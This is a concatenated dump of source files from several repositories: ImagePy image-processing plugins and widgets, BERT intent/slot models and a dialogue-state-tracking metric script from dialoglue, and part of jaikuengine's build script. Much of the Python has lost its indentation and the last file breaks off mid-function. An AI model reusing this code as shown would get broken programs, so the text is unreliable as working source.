IPy.alert('dulwich is needed, you can use Plugins > Install > Install Packages:\ndulwich --global-option="--pure" to install')
return False
return True
def run(self, para=None):
IPy.set_info('update now, waiting...')
repo = self.repo('../')
client, remote_path = self.trans('https://github.com/Image-Py/imagepy.git')
a = client.fetch(remote_path, repo)
IPy.alert('imagepy update done!')
class Refresh(Free):
title = 'Reload Plugins'
def run(self, para=None):
IPy.curapp.reload_plugins()
plgs = [Update, Refresh]
```
#### File: menus/Process/calculator_plg.py
```python
from imagepy.core.manager import WindowsManager
from imagepy import IPy
from imagepy.core.engine import Simple
from imagepy.core.pixel import bliter
class Plugin(Simple):
"""Calculator Plugin derived from imagepy.core.engine.Simple """
title = 'Image Calculator'
note = ['all']
para = {'img1':'','op':'add','img2':''}
def load(self, ips):
titles = WindowsManager.get_titles()
self.para['img1'] = titles[0]
self.para['img2'] = titles[0]
Plugin.view = [(list, titles, str, 'image1', 'img1', ''),
(list, ['max', 'min', 'diff', 'add', 'substract'
], str, 'operator', 'op',''),
(list, titles, str, 'image2', 'img2', '')]
return True
def run(self, ips, imgs, para = None):
ips1 = WindowsManager.get(para['img1']).ips
ips2 = WindowsManager.get(para['img2']).ips
ips1.snapshot()
sl1, sl2 = ips1.get_nslices(), ips2.get_nslices()
cn1, cn2 = ips1.get_nchannels(), ips2.get_nchannels()
if ips1.dtype != ips2.dtype:
IPy.alert('Two stack must be equal dtype!')
return
elif sl1>1 and sl2>1 and sl1!=sl2:
IPy.alert('Two stack must have equal slices!')
return
elif cn1>1 and cn2>1 and cn1!=cn2:
IPy.alert('Two stack must have equal channels!')
return
w, h = ips1.size, ips2.size
w, h = min(w[0], h[0]), min(w[1], h[1])
if sl1 == 1:
bliter.blit(ips1.img, ips2.img, mode=para['op'])
elif sl1>1 and sl2==1:
for i in range(sl1):
self.progress(i, sl1)
bliter.blit(ips1.imgs[i], ips2.img, mode=para['op'])
elif sl1>1 and sl2>1:
for i in range(sl1):
self.progress(i, sl1)
bliter.blit(ips1.imgs[i], ips2.imgs[i], mode=para['op'])
ips1.update = 'pix'
```
#### File: imagepy/ui/widgets.py
```python
import wx
import numpy as np
class HistCanvas(wx.Panel):
""" HistCanvas: diverid from wx.core.Panel """
def __init__(self, parent ):
wx.Panel.__init__ ( self, parent, id = wx.ID_ANY,
pos = wx.DefaultPosition, size = wx.Size(256,81),
style = wx.TAB_TRAVERSAL )
self.init_buf()
self.his = None
self.update = False
self.x1, self.x2 = 0, 255
self.Bind(wx.EVT_SIZE, self.on_size)
self.Bind(wx.EVT_IDLE, self.on_idle)
self.Bind(wx.EVT_PAINT, self.on_paint)
def init_buf(self):
box = self.GetClientSize()
self.buffer = wx.Bitmap(box.width, box.height)
def on_size(self, event):
self.init_buf()
self.update = True
def on_idle(self, event):
if self.update == True:
self.draw()
self.update = False
def on_paint(self, event):
wx.BufferedPaintDC(self, self.buffer)
def set_hist(self, hist):
self.hist = (hist*80/hist.max()).astype(np.uint8)
self.update = True
def set_lim(self, x1, x2):
self.x1, self.x2 = x1, x2
self.update = True
def draw(self):
if self.hist is None:
return
# get client device context buffer
dc = wx.BufferedDC(wx.ClientDC(self), self.buffer)
dc.Clear()
# w, h = self.GetClientSize()
# the main draw process
print("drawing histogram")
dc.SetPen(wx.Pen((100,100,100), width=1, style=wx.SOLID))
for i in range(256):
dc.DrawLine(i,80,i,80-self.hist[i])
dc.SetPen(wx.Pen((0,0,0), width=1, style=wx.SOLID))
dc.DrawLine(self.x1, 80, self.x2, 0)
dc.DrawLines([(0,0),(255,0),(255,80),(0,80),(0,0)])
class NumCtrl(wx.TextCtrl):
"""NumCtrl: diverid from wx.core.TextCtrl """
def __init__(self, parent, rang, accury):
wx.TextCtrl.__init__(self, parent, wx.TE_RIGHT)
self.min, self.max = rang
self.accury = accury
wx.TextCtrl.Bind(self, wx.EVT_KEY_UP, self.ontext)
    # Note: Bind is overridden to store the dialog's handler; ontext invokes it and then validates the value.
def Bind(self, z, f):
self.f = f
def ontext(self, event):
self.f(event)
if self.GetValue()==None:
self.SetBackgroundColour((255,255,0))
else:
self.SetBackgroundColour((255,255,255))
def SetValue(self, n):
wx.TextCtrl.SetValue(self, str(round(n,self.accury) if self.accury>0 else int(n)))
def GetValue(self):
sval = wx.TextCtrl.GetValue(self)
try:
num = float(sval) if self.accury>0 else int(sval)
except ValueError:
return None
if num<self.min or num>self.max:
return None
if abs(round(num, self.accury) - num) > 1E-5:
return None
return num
class ColorCtrl(wx.TextCtrl):
"""ColorCtrl: deverid fron wx.coreTextCtrl"""
def __init__(self, parent):
wx.TextCtrl.__init__(self, parent, wx.TE_RIGHT)
wx.TextCtrl.Bind(self, wx.EVT_KEY_UP, self.ontext)
wx.TextCtrl.Bind(self, wx.EVT_LEFT_DOWN, self.oncolor)
def Bind(self, z, f):
self.f = f
def ontext(self, event):
print('ColorCtrl')
def oncolor(self, event):
rst = None
dlg = wx.ColourDialog(self)
dlg.GetColourData().SetChooseFull(True)
if dlg.ShowModal() == wx.ID_OK:
rst = dlg.GetColourData().GetColour()
self.SetBackgroundColour(rst)
self.SetValue(rst.GetAsString(wx.C2S_HTML_SYNTAX))
self.f(event)
dlg.Destroy()
def SetValue(self, color):
wx.TextCtrl.SetBackgroundColour(self, color)
des = self.GetBackgroundColour().GetAsString(wx.C2S_HTML_SYNTAX)
wx.TextCtrl.SetValue(self, des)
def GetValue(self):
return self.GetBackgroundColour().Get(False)
if __name__ == '__main__':
    app = wx.App()
    frame = wx.Frame(None)
    hist = HistCanvas(frame)
frame.Fit()
frame.Show(True)
hist.set_hist(np.arange(256))
app.MainLoop()
``` |
{
"source": "jimpei8989/dialoglue",
"score": 2
} |
#### File: jimpei8989/dialoglue/bert_models.py
```python
import torch
import torch.nn.functional as F
from collections import defaultdict
from torch import nn
from torch.nn import CrossEntropyLoss, NLLLoss
from torch.nn import Dropout
from transformers import BertConfig, BertModel, BertForMaskedLM
from typing import Any
class BertPretrain(torch.nn.Module):
def __init__(self,
model_name_or_path: str):
super(BertPretrain, self).__init__()
self.bert_model = BertForMaskedLM.from_pretrained(model_name_or_path)
def forward(self,
input_ids: torch.tensor,
mlm_labels: torch.tensor):
outputs = self.bert_model(input_ids, masked_lm_labels=mlm_labels)
return outputs[0]
class IntentBertModel(torch.nn.Module):
def __init__(self,
model_name_or_path: str,
dropout: float,
num_intent_labels: int):
super(IntentBertModel, self).__init__()
self.bert_model = BertModel.from_pretrained(model_name_or_path)
self.dropout = Dropout(dropout)
self.num_intent_labels = num_intent_labels
self.intent_classifier = nn.Linear(self.bert_model.config.hidden_size, num_intent_labels)
def forward(self,
input_ids: torch.tensor,
attention_mask: torch.tensor,
token_type_ids: torch.tensor,
intent_label: torch.tensor = None):
pooled_output = self.bert_model(input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids)[1]
intent_logits = self.intent_classifier(self.dropout(pooled_output))
# Compute losses if labels provided
if intent_label is not None:
loss_fct = CrossEntropyLoss()
intent_loss = loss_fct(intent_logits.view(-1, self.num_intent_labels), intent_label.type(torch.long))
else:
intent_loss = torch.tensor(0)
return intent_logits, intent_loss
class SlotBertModel(torch.nn.Module):
def __init__(self,
model_name_or_path: str,
dropout: float,
num_slot_labels: int):
super(SlotBertModel, self).__init__()
self.bert_model = BertModel.from_pretrained(model_name_or_path)
self.dropout = Dropout(dropout)
self.num_slot_labels = num_slot_labels
self.slot_classifier = nn.Linear(self.bert_model.config.hidden_size, num_slot_labels)
def encode(self,
input_ids: torch.tensor,
attention_mask: torch.tensor,
token_type_ids: torch.tensor):
hidden_states, _ = self.bert_model(input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids)
return hidden_states
def forward(self,
input_ids: torch.tensor,
attention_mask: torch.tensor,
token_type_ids: torch.tensor,
slot_labels: torch.tensor = None):
hidden_states = self.encode(input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids)
slot_logits = self.slot_classifier(self.dropout(hidden_states))
# Compute losses if labels provided
if slot_labels is not None:
loss_fct = CrossEntropyLoss()
# Only keep active parts of the loss
if attention_mask is not None:
active_loss = attention_mask.view(-1) == 1
active_logits = slot_logits.view(-1, self.num_slot_labels)[active_loss]
active_labels = slot_labels.view(-1)[active_loss]
slot_loss = loss_fct(active_logits, active_labels.type(torch.long))
else:
slot_loss = loss_fct(slot_logits.view(-1, self.num_slot_labels), slot_labels.view(-1).type(torch.long))
else:
slot_loss = torch.tensor(0).cuda() if torch.cuda.is_available() else torch.tensor(0)
return slot_logits, slot_loss
class JointSlotIntentBertModel(torch.nn.Module):
def __init__(self,
model_name_or_path: str,
dropout: float,
num_intent_labels: int,
num_slot_labels: int):
super(JointSlotIntentBertModel, self).__init__()
self.bert_model = BertModel.from_pretrained(model_name_or_path)
self.dropout = Dropout(dropout)
self.num_intent_labels = num_intent_labels
self.num_slot_labels = num_slot_labels
self.intent_classifier = nn.Linear(self.bert_model.config.hidden_size, num_intent_labels)
self.slot_classifier = nn.Linear(self.bert_model.config.hidden_size, num_slot_labels)
def forward(self,
input_ids: torch.tensor,
attention_mask: torch.tensor,
token_type_ids: torch.tensor,
intent_label: torch.tensor = None,
slot_labels: torch.tensor = None):
hidden_states, pooled_output = self.bert_model(input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids)
intent_logits = self.intent_classifier(self.dropout(pooled_output))
slot_logits = self.slot_classifier(self.dropout(hidden_states))
# Compute losses if labels provided
if slot_labels is not None:
loss_fct = CrossEntropyLoss()
# Only keep active parts of the loss
if attention_mask is not None:
active_loss = attention_mask.view(-1) == 1
active_logits = slot_logits.view(-1, self.num_slot_labels)[active_loss]
active_labels = slot_labels.view(-1)[active_loss]
slot_loss = loss_fct(active_logits, active_labels.type(torch.long))
else:
slot_loss = loss_fct(slot_logits.view(-1, self.num_slot_labels), slot_labels.view(-1).type(torch.long))
else:
slot_loss = torch.tensor(0).cuda() if torch.cuda.is_available() else torch.tensor(0)
# Compute losses if labels provided
if intent_label is not None:
loss_fct = CrossEntropyLoss()
intent_loss = loss_fct(intent_logits.view(-1, self.num_intent_labels), intent_label.type(torch.long))
else:
intent_loss = torch.tensor(0)
return intent_logits, slot_logits, intent_loss + slot_loss
```
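As a quick illustration (not part of the repository), the sketch below runs a forward pass through `JointSlotIntentBertModel` with dummy tensors. The `bert-base-uncased` checkpoint, the label counts, the batch shape and the `bert_models` import path are assumptions, and it presumes the older `transformers` releases (tuple outputs from `BertModel`) that this file is written against.
```python
# Hypothetical usage sketch -- checkpoint name, label counts and shapes are assumptions.
import torch

from bert_models import JointSlotIntentBertModel  # assumes this file is on the import path

model = JointSlotIntentBertModel("bert-base-uncased", dropout=0.1,
                                 num_intent_labels=5, num_slot_labels=10)

batch_size, seq_len = 2, 16
input_ids = torch.randint(0, model.bert_model.config.vocab_size, (batch_size, seq_len))
attention_mask = torch.ones(batch_size, seq_len, dtype=torch.long)
token_type_ids = torch.zeros(batch_size, seq_len, dtype=torch.long)
intent_label = torch.randint(0, 5, (batch_size,))
slot_labels = torch.randint(0, 10, (batch_size, seq_len))

intent_logits, slot_logits, loss = model(input_ids, attention_mask, token_type_ids,
                                         intent_label=intent_label, slot_labels=slot_labels)
print(intent_logits.shape, slot_logits.shape, loss.item())
```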
#### File: dialoglue/trippy/bert_models.py
```python
import torch
from transformers import BertForMaskedLM
class BertPretrain(torch.nn.Module):
def __init__(self, model_name_or_path: str):
super(BertPretrain, self).__init__()
self.bert_model = BertForMaskedLM.from_pretrained(model_name_or_path)
def forward(self, input_ids: torch.tensor, mlm_labels: torch.tensor):
outputs = self.bert_model(input_ids, masked_lm_labels=mlm_labels)
return outputs[0]
```
#### File: dialoglue/trippy/metric_bert_dst.py
```python
import glob
import json
import sys
import numpy as np
import re
def load_dataset_config(dataset_config):
with open(dataset_config, "r", encoding="utf-8") as f:
raw_config = json.load(f)
return raw_config["class_types"], raw_config["slots"], raw_config["label_maps"]
def tokenize(text):
if "\u0120" in text:
text = re.sub(" ", "", text)
text = re.sub("\u0120", " ", text)
text = text.strip()
return " ".join([tok for tok in map(str.strip, re.split("(\W+)", text)) if len(tok) > 0])
def is_in_list(tok, value):
found = False
tok_list = [item for item in map(str.strip, re.split("(\W+)", tok)) if len(item) > 0]
value_list = [item for item in map(str.strip, re.split("(\W+)", value)) if len(item) > 0]
tok_len = len(tok_list)
value_len = len(value_list)
for i in range(tok_len + 1 - value_len):
if tok_list[i : i + value_len] == value_list:
found = True
break
return found
def check_slot_inform(value_label, inform_label, label_maps):
value = inform_label
if value_label == inform_label:
value = value_label
elif is_in_list(inform_label, value_label):
value = value_label
elif is_in_list(value_label, inform_label):
value = value_label
elif inform_label in label_maps:
for inform_label_variant in label_maps[inform_label]:
if value_label == inform_label_variant:
value = value_label
break
elif is_in_list(inform_label_variant, value_label):
value = value_label
break
elif is_in_list(value_label, inform_label_variant):
value = value_label
break
elif value_label in label_maps:
for value_label_variant in label_maps[value_label]:
if value_label_variant == inform_label:
value = value_label
break
elif is_in_list(inform_label, value_label_variant):
value = value_label
break
elif is_in_list(value_label_variant, inform_label):
value = value_label
break
return value
def get_joint_slot_correctness(
fp,
class_types,
label_maps,
key_class_label_id="class_label_id",
key_class_prediction="class_prediction",
key_start_pos="start_pos",
key_start_prediction="start_prediction",
key_end_pos="end_pos",
key_end_prediction="end_prediction",
key_refer_id="refer_id",
key_refer_prediction="refer_prediction",
key_slot_groundtruth="slot_groundtruth",
key_slot_prediction="slot_prediction",
):
with open(fp) as f:
preds = json.load(f)
class_correctness = [[] for cl in range(len(class_types) + 1)]
confusion_matrix = [
[[] for cl_b in range(len(class_types))] for cl_a in range(len(class_types))
]
pos_correctness = []
refer_correctness = []
val_correctness = []
total_correctness = []
c_tp = {ct: 0 for ct in range(len(class_types))}
c_tn = {ct: 0 for ct in range(len(class_types))}
c_fp = {ct: 0 for ct in range(len(class_types))}
c_fn = {ct: 0 for ct in range(len(class_types))}
for pred in preds:
guid = pred["guid"] # List: set_type, dialogue_idx, turn_idx
turn_gt_class = pred[key_class_label_id]
turn_pd_class = pred[key_class_prediction]
gt_start_pos = pred[key_start_pos]
pd_start_pos = pred[key_start_prediction]
gt_end_pos = pred[key_end_pos]
pd_end_pos = pred[key_end_prediction]
gt_refer = pred[key_refer_id]
pd_refer = pred[key_refer_prediction]
gt_slot = pred[key_slot_groundtruth]
pd_slot = pred[key_slot_prediction]
gt_slot = tokenize(gt_slot)
pd_slot = tokenize(pd_slot)
# Make sure the true turn labels are contained in the prediction json file!
joint_gt_slot = gt_slot
if guid[-1] == "0": # First turn, reset the slots
joint_pd_slot = "none"
# If turn_pd_class or a value to be copied is "none", do not update the dialog state.
if turn_pd_class == class_types.index("none"):
pass
elif turn_pd_class == class_types.index("dontcare"):
joint_pd_slot = "dontcare"
elif turn_pd_class == class_types.index("copy_value"):
joint_pd_slot = pd_slot
elif "true" in class_types and turn_pd_class == class_types.index("true"):
joint_pd_slot = "true"
elif "false" in class_types and turn_pd_class == class_types.index("false"):
joint_pd_slot = "false"
elif "refer" in class_types and turn_pd_class == class_types.index("refer"):
if pd_slot[0:3] == "§§ ":
if pd_slot[3:] != "none":
joint_pd_slot = check_slot_inform(joint_gt_slot, pd_slot[3:], label_maps)
elif pd_slot[0:2] == "§§":
if pd_slot[2:] != "none":
joint_pd_slot = check_slot_inform(joint_gt_slot, pd_slot[2:], label_maps)
elif pd_slot != "none":
joint_pd_slot = pd_slot
elif "inform" in class_types and turn_pd_class == class_types.index("inform"):
if pd_slot[0:3] == "§§ ":
if pd_slot[3:] != "none":
joint_pd_slot = check_slot_inform(joint_gt_slot, pd_slot[3:], label_maps)
elif pd_slot[0:2] == "§§":
if pd_slot[2:] != "none":
joint_pd_slot = check_slot_inform(joint_gt_slot, pd_slot[2:], label_maps)
else:
print("ERROR: Unexpected slot value format. Aborting.")
exit()
else:
print("ERROR: Unexpected class_type. Aborting.")
exit()
total_correct = True
# Check the per turn correctness of the class_type prediction
if turn_gt_class == turn_pd_class:
class_correctness[turn_gt_class].append(1.0)
class_correctness[-1].append(1.0)
c_tp[turn_gt_class] += 1
for cc in range(len(class_types)):
if cc != turn_gt_class:
c_tn[cc] += 1
# Only where there is a span, we check its per turn correctness
if turn_gt_class == class_types.index("copy_value"):
if gt_start_pos == pd_start_pos and gt_end_pos == pd_end_pos:
pos_correctness.append(1.0)
else:
pos_correctness.append(0.0)
# Only where there is a referral, we check its per turn correctness
if "refer" in class_types and turn_gt_class == class_types.index("refer"):
if gt_refer == pd_refer:
refer_correctness.append(1.0)
print(" [%s] Correct referral: %s | %s" % (guid, gt_refer, pd_refer))
else:
refer_correctness.append(0.0)
print(" [%s] Incorrect referral: %s | %s" % (guid, gt_refer, pd_refer))
else:
if turn_gt_class == class_types.index("copy_value"):
pos_correctness.append(0.0)
if "refer" in class_types and turn_gt_class == class_types.index("refer"):
refer_correctness.append(0.0)
class_correctness[turn_gt_class].append(0.0)
class_correctness[-1].append(0.0)
confusion_matrix[turn_gt_class][turn_pd_class].append(1.0)
c_fn[turn_gt_class] += 1
c_fp[turn_pd_class] += 1
# Check the joint slot correctness.
# If the value label is not none, then we need to have a value prediction.
# Even if the class_type is 'none', there can still be a value label,
# it might just not be pointable in the current turn. It might however
# be referrable and thus predicted correctly.
if joint_gt_slot == joint_pd_slot:
val_correctness.append(1.0)
elif (
joint_gt_slot != "none"
and joint_gt_slot != "dontcare"
and joint_gt_slot != "true"
and joint_gt_slot != "false"
and joint_gt_slot in label_maps
):
no_match = True
for variant in label_maps[joint_gt_slot]:
if variant == joint_pd_slot:
no_match = False
break
if no_match:
val_correctness.append(0.0)
total_correct = False
print(
" [%s] Incorrect value (variant): %s (turn class: %s) | %s (turn class: %s)"
% (guid, joint_gt_slot, turn_gt_class, joint_pd_slot, turn_pd_class)
)
else:
val_correctness.append(1.0)
else:
val_correctness.append(0.0)
total_correct = False
print(
" [%s] Incorrect value: %s (turn class: %s) | %s (turn class: %s)"
% (guid, joint_gt_slot, turn_gt_class, joint_pd_slot, turn_pd_class)
)
total_correctness.append(1.0 if total_correct else 0.0)
# Account for empty lists (due to no instances of spans or referrals being seen)
if pos_correctness == []:
pos_correctness.append(1.0)
if refer_correctness == []:
refer_correctness.append(1.0)
for ct in range(len(class_types)):
if c_tp[ct] + c_fp[ct] > 0:
precision = c_tp[ct] / (c_tp[ct] + c_fp[ct])
else:
precision = 1.0
if c_tp[ct] + c_fn[ct] > 0:
recall = c_tp[ct] / (c_tp[ct] + c_fn[ct])
else:
recall = 1.0
if precision + recall > 0:
f1 = 2 * ((precision * recall) / (precision + recall))
else:
f1 = 1.0
if c_tp[ct] + c_tn[ct] + c_fp[ct] + c_fn[ct] > 0:
acc = (c_tp[ct] + c_tn[ct]) / (c_tp[ct] + c_tn[ct] + c_fp[ct] + c_fn[ct])
else:
acc = 1.0
print(
"Performance for class '%s' (%s): Recall: %.2f (%d of %d), Precision: %.2f, F1: %.2f, Accuracy: %.2f (TP/TN/FP/FN: %d/%d/%d/%d)"
% (
class_types[ct],
ct,
recall,
np.sum(class_correctness[ct]),
len(class_correctness[ct]),
precision,
f1,
acc,
c_tp[ct],
c_tn[ct],
c_fp[ct],
c_fn[ct],
)
)
print("Confusion matrix:")
for cl in range(len(class_types)):
print(" %s" % (cl), end="")
print("")
for cl_a in range(len(class_types)):
print("%s " % (cl_a), end="")
for cl_b in range(len(class_types)):
if len(class_correctness[cl_a]) > 0:
print(
"%.2f "
% (np.sum(confusion_matrix[cl_a][cl_b]) / len(class_correctness[cl_a])),
end="",
)
else:
print("---- ", end="")
print("")
return (
np.asarray(total_correctness),
np.asarray(val_correctness),
np.asarray(class_correctness),
np.asarray(pos_correctness),
np.asarray(refer_correctness),
np.asarray(confusion_matrix),
c_tp,
c_tn,
c_fp,
c_fn,
)
if __name__ == "__main__":
acc_list = []
acc_list_v = []
key_class_label_id = "class_label_id_%s"
key_class_prediction = "class_prediction_%s"
key_start_pos = "start_pos_%s"
key_start_prediction = "start_prediction_%s"
key_end_pos = "end_pos_%s"
key_end_prediction = "end_prediction_%s"
key_refer_id = "refer_id_%s"
key_refer_prediction = "refer_prediction_%s"
key_slot_groundtruth = "slot_groundtruth_%s"
key_slot_prediction = "slot_prediction_%s"
dataset = sys.argv[1].lower()
dataset_config = sys.argv[2].lower()
if dataset not in ["woz2", "sim-m", "sim-r", "multiwoz21"]:
raise ValueError("Task not found: %s" % (dataset))
class_types, slots, label_maps = load_dataset_config(dataset_config)
# Prepare label_maps
label_maps_tmp = {}
for v in label_maps:
label_maps_tmp[tokenize(v)] = [tokenize(nv) for nv in label_maps[v]]
label_maps = label_maps_tmp
for fp in sorted(glob.glob(sys.argv[3])):
print(fp)
goal_correctness = 1.0
cls_acc = [[] for cl in range(len(class_types))]
cls_conf = [[[] for cl_b in range(len(class_types))] for cl_a in range(len(class_types))]
c_tp = {ct: 0 for ct in range(len(class_types))}
c_tn = {ct: 0 for ct in range(len(class_types))}
c_fp = {ct: 0 for ct in range(len(class_types))}
c_fn = {ct: 0 for ct in range(len(class_types))}
for slot in slots:
(
tot_cor,
joint_val_cor,
cls_cor,
pos_cor,
ref_cor,
conf_mat,
ctp,
ctn,
cfp,
cfn,
) = get_joint_slot_correctness(
fp,
class_types,
label_maps,
key_class_label_id=(key_class_label_id % slot),
key_class_prediction=(key_class_prediction % slot),
key_start_pos=(key_start_pos % slot),
key_start_prediction=(key_start_prediction % slot),
key_end_pos=(key_end_pos % slot),
key_end_prediction=(key_end_prediction % slot),
key_refer_id=(key_refer_id % slot),
key_refer_prediction=(key_refer_prediction % slot),
key_slot_groundtruth=(key_slot_groundtruth % slot),
key_slot_prediction=(key_slot_prediction % slot),
)
print(
"%s: joint slot acc: %g, joint value acc: %g, turn class acc: %g, turn position acc: %g, turn referral acc: %g"
% (
slot,
np.mean(tot_cor),
np.mean(joint_val_cor),
np.mean(cls_cor[-1]),
np.mean(pos_cor),
np.mean(ref_cor),
)
)
goal_correctness *= tot_cor
for cl_a in range(len(class_types)):
cls_acc[cl_a] += cls_cor[cl_a]
for cl_b in range(len(class_types)):
cls_conf[cl_a][cl_b] += list(conf_mat[cl_a][cl_b])
c_tp[cl_a] += ctp[cl_a]
c_tn[cl_a] += ctn[cl_a]
c_fp[cl_a] += cfp[cl_a]
c_fn[cl_a] += cfn[cl_a]
for ct in range(len(class_types)):
if c_tp[ct] + c_fp[ct] > 0:
precision = c_tp[ct] / (c_tp[ct] + c_fp[ct])
else:
precision = 1.0
if c_tp[ct] + c_fn[ct] > 0:
recall = c_tp[ct] / (c_tp[ct] + c_fn[ct])
else:
recall = 1.0
if precision + recall > 0:
f1 = 2 * ((precision * recall) / (precision + recall))
else:
f1 = 1.0
if c_tp[ct] + c_tn[ct] + c_fp[ct] + c_fn[ct] > 0:
acc = (c_tp[ct] + c_tn[ct]) / (c_tp[ct] + c_tn[ct] + c_fp[ct] + c_fn[ct])
else:
acc = 1.0
print(
"Performance for class '%s' (%s): Recall: %.2f (%d of %d), Precision: %.2f, F1: %.2f, Accuracy: %.2f (TP/TN/FP/FN: %d/%d/%d/%d)"
% (
class_types[ct],
ct,
recall,
np.sum(cls_acc[ct]),
len(cls_acc[ct]),
precision,
f1,
acc,
c_tp[ct],
c_tn[ct],
c_fp[ct],
c_fn[ct],
)
)
print("Confusion matrix:")
for cl in range(len(class_types)):
print(" %s" % (cl), end="")
print("")
for cl_a in range(len(class_types)):
print("%s " % (cl_a), end="")
for cl_b in range(len(class_types)):
if len(cls_acc[cl_a]) > 0:
print("%.2f " % (np.sum(cls_conf[cl_a][cl_b]) / len(cls_acc[cl_a])), end="")
else:
print("---- ", end="")
print("")
acc = np.mean(goal_correctness)
acc_list.append((fp, acc))
acc_list_s = sorted(acc_list, key=lambda tup: tup[1], reverse=True)
for (fp, acc) in acc_list_s:
# import pdb; pdb.set_trace()
print("Joint goal acc: %g, %s" % (acc, fp))
``` |
{
"source": "jimpick/jaikuengine",
"score": 2
} |
#### File: jimpick/jaikuengine/build.py
```python
import glob
import logging
import md5
import os
import random
import re
import sys
import StringIO
import time
import zipfile
import os.path
ZIP_SKIP_RE = re.compile('\.svn|\.pyc|\.[pm]o')
IGNORED_CONTRIB = ('admin', 'gis', 'comments', 'localflavor', 'databrowse')
ROOT_DIR = os.path.dirname(__file__)
DOC_DIR = os.path.join(ROOT_DIR, 'doc')
RST_TEMPLATE_PATH = os.path.join(DOC_DIR, 'template.rst2html')
API_TEMPLATE_DIR = os.path.join(ROOT_DIR, 'api', 'templates')
HELP_SITE_NAME = """
Your site name is important, it's the name of your site!
"""
HELP_SECRET_KEY = """
This is a secret key, you should keep it secret.
"""
HELP_GAE_DOMAIN = """
This is the appspot.com domain you are going to host your app at. Even if you
are running under a hosted domain you will want to set this so that you can
allow SSL for logins.
"""
HELP_HOSTED_DOMAIN_ENABLED = """
Are you hosting this on your own domain instead of YOUR_APP.appspot.com? If so
you need to check this box and enter the domain you are using below.
"""
HELP_HOSTED_DOMAIN = """
If you checked the box to Enable Hosted Domain above you will need to enter
the domain you are hosting on here.
"""
HELP_NS_DOMAIN = """
This is the namespace you plan on using for the nicknames of your users. A
safe bet is to set this to be the same as the Hosted Domain above, or your
Google App Engine Domain if you did not enable Hosted Domains.
"""
HELP_ROOT_NICK = """
This is the nick for the admin user. It should probably look something like
admin@<Your Namespace Domain>
"""
HELP_SSL_LOGIN_ENABLED = """
Enabling SSL logins is a good idea for the safety of your users. If you have
enabled Hosted Domains above, your login page will be shown via the Google App Engine Domain listed above.
"""
HELP_DEFAULT_FROM_EMAIL = """
This is the email address that mail from your app will be sent from; it needs to be
one of the developers of the app (i.e. you) for App Engine to accept it.
"""
def bootstrap(only_check_for_zips=False):
logging.info('Beginning bootstrap...')
l = os.listdir('vendor')
for vendor_lib in l:
if vendor_lib.startswith('.'):
continue
if only_check_for_zips and os.path.exists('%s.zip' % vendor_lib):
continue
logging.info('Building zip for %s...' % vendor_lib)
zip_vendor_lib(vendor_lib)
logging.info('Finishing bootstrap.')
def monkey_patch_skipped_files():
logging.info('Monkey patching dev_appserver...')
from google.appengine.tools import dev_appserver as da
def _patch(logical_filename, normcase=os.path.normcase):
"""Determines if a file's path is accessible.
This is an internal part of the IsFileAccessible implementation.
Args:
logical_filename: Absolute path of the file to check.
normcase: Used for dependency injection.
Returns:
True if the file is accessible, False otherwise.
"""
if da.IsPathInSubdirectories(logical_filename, [da.FakeFile._root_path],
normcase=normcase):
relative_filename = logical_filename[len(da.FakeFile._root_path):]
#if da.FakeFile._skip_files.match(relative_filename):
# logging.warning('Blocking access to skipped file "%s"',
# logical_filename)
# return False
if da.FakeFile._static_file_config_matcher.IsStaticFile(relative_filename):
logging.warning('Blocking access to static file "%s"',
logical_filename)
return False
if logical_filename in da.FakeFile.ALLOWED_FILES:
return True
if da.IsPathInSubdirectories(logical_filename,
da.FakeFile.ALLOWED_SITE_PACKAGE_DIRS,
normcase=normcase):
return True
allowed_dirs = da.FakeFile._application_paths | da.FakeFile.ALLOWED_DIRS
if (da.IsPathInSubdirectories(logical_filename,
allowed_dirs,
normcase=normcase) and
not da.IsPathInSubdirectories(logical_filename,
da.FakeFile.NOT_ALLOWED_DIRS,
normcase=normcase)):
return True
return False
da.FakeFile._IsFileAccessibleNoCache = staticmethod(_patch)
def generate_api_docs():
logging.info('Generating api docs...')
from epydoc import docparser
try:
import roman
except ImportError:
print ("Could not import module 'roman,' docutils has not been installed"
"properly")
print "Please install docutils: http://docutils.sourceforge.net"
sys.exit(1)
from common import api
a = docparser.parse_docs(name='common.api')
variables = a.apidoc_links(imports=False,
packages=False,
submodules=False,
bases=False,
subclasses=False,
private=False,
overrides=False)
public_api_methods = api.PublicApi.methods.keys()
public_decorators = ['throttle', 'owner_required']
allowed_names = public_api_methods + public_decorators
for v in variables:
if v.name in public_api_methods:
prefix = "method"
elif v.name in public_decorators:
prefix = "deco"
else:
continue
filename = '%s_%s.txt' % (prefix, v.name)
path = os.path.join(DOC_DIR, filename)
logging.info(' for %s...' % v.name)
docs = rst_docs(v.value)
f = open(path, 'w')
f.write(docs)
f.close()
logging.info('Finished generating api docs.')
def build_docs():
logging.info('Building html docs...')
txts = glob.glob(os.path.join(DOC_DIR, '*.txt'))
for t in txts:
basename = os.path.basename(t)
baseroot, ext = os.path.splitext(basename)
outname = os.path.join(API_TEMPLATE_DIR, 'built_%s.html' % baseroot)
logging.info(' for %s...' % baseroot)
infile = open(t)
outfile = open(outname, 'w')
rst_to_html(infile, outfile)
infile.close()
outfile.close()
logging.info('Finished building html docs.')
def check_config():
# TODO(termie):
pass
def build_config(write_to_file=False):
d = {}
d['SITE_NAME'] = get_input(HELP_SITE_NAME, 'Enter a site name')
d['SECRET_KEY'] = get_input(HELP_SECRET_KEY,
'Enter a secret key',
generate_secret_key())
d['GAE_DOMAIN'] = get_input(HELP_GAE_DOMAIN,
'Enter an appspot domain')
d['HOSTED_DOMAIN_ENABLED'] = get_input(HELP_HOSTED_DOMAIN_ENABLED,
'Enabled Hosted Domains (yes|no)',
'yes',
yesno)
if d['HOSTED_DOMAIN_ENABLED']:
d['HOSTED_DOMAIN'] = get_input(HELP_HOSTED_DOMAIN,
'Enter your hosted domain (without www.)')
if d['HOSTED_DOMAIN_ENABLED']:
default_ns = d['HOSTED_DOMAIN']
d['DOMAIN'] = 'www.%s' % d['HOSTED_DOMAIN']
else:
default_ns = d['GAE_DOMAIN']
d['DOMAIN'] = d['GAE_DOMAIN']
d['NS_DOMAIN'] = get_input(HELP_NS_DOMAIN,
'Enter your namespace domain',
default_ns)
default_root = 'admin@%s' % d['NS_DOMAIN']
d['ROOT_NICK'] = get_input(HELP_ROOT_NICK,
'Enter the nick for your admin user',
